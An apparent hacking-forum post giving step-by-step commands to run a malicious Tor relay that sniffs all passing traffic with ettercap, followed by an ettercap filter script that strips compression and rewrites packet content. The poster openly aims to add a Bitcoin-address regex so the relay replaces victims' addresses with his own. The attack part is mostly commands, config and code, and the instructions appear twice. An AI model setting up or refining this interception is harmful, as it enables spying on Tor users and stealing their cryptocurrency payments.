Tor MiTM Relay 09-09-2020, 06:12 PM
#1
So in light of recent events I thought I'd show you a quick way to setup a Tor MiTM Relay, this was done on Debian Buster (10.5)
Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list
When those packages have finished installing Tor will automatically start running so let's stop that
Now remove the default Tor config
Now create a new torrc file and paste the following
Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want
Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list
Code:
apt update
apt install torWhen those packages have finished installing Tor will automatically start running so let's stop that
Code:
systemctl stop torNow remove the default Tor config
Code:
rm /etc/tor/torrcNow create a new torrc file and paste the following
Code:
touch /etc/tor/torrcCode:
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D - DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME - CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want
Code:
tor --hash-password YOURPASSWORDNow we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Code:
tor -f /etc/tor/torrcWait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Code:
apt install ettercapNow our relay is up and running so how do we start sniffing the traffic ? with one simple command
Code:
ettercap -T -w dump.pcap -E -i wlp2s0This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)
Code:
##
# This filter will replace certain words In tcp packet
# requests befor forward the packet back to target host.
# based on code from ALoR, NaGA & Morpheus
##
##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("\n[test] host:127.0.0.1 [ ⊶ ] found ☆");
msg("[test] |_ packet Accept-Encoding zapped ✔\n");
}
}
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
msg("[test] host:127.0.0.1 [ <- ] port:80 http ☆");
if (search(DATA.data, "gzip")) {
replace("gzip", " "); # note: four spaces In the replacement string
}
}
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "deflate")) {
replace("deflate", " "); # note: seven spaces In the replacement string
}
}
#####################
## Replace Content ##
#####################
# change server response to target
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "hello")){
replace("hello", "hello");
msg("\n[test] host:127.0.0.1 [ ⊶ ] found ☆");
msg("[test] | status : string found in tcp packet ✔");
msg("[test] |_info : packet forward back to target ✔\n");
}
}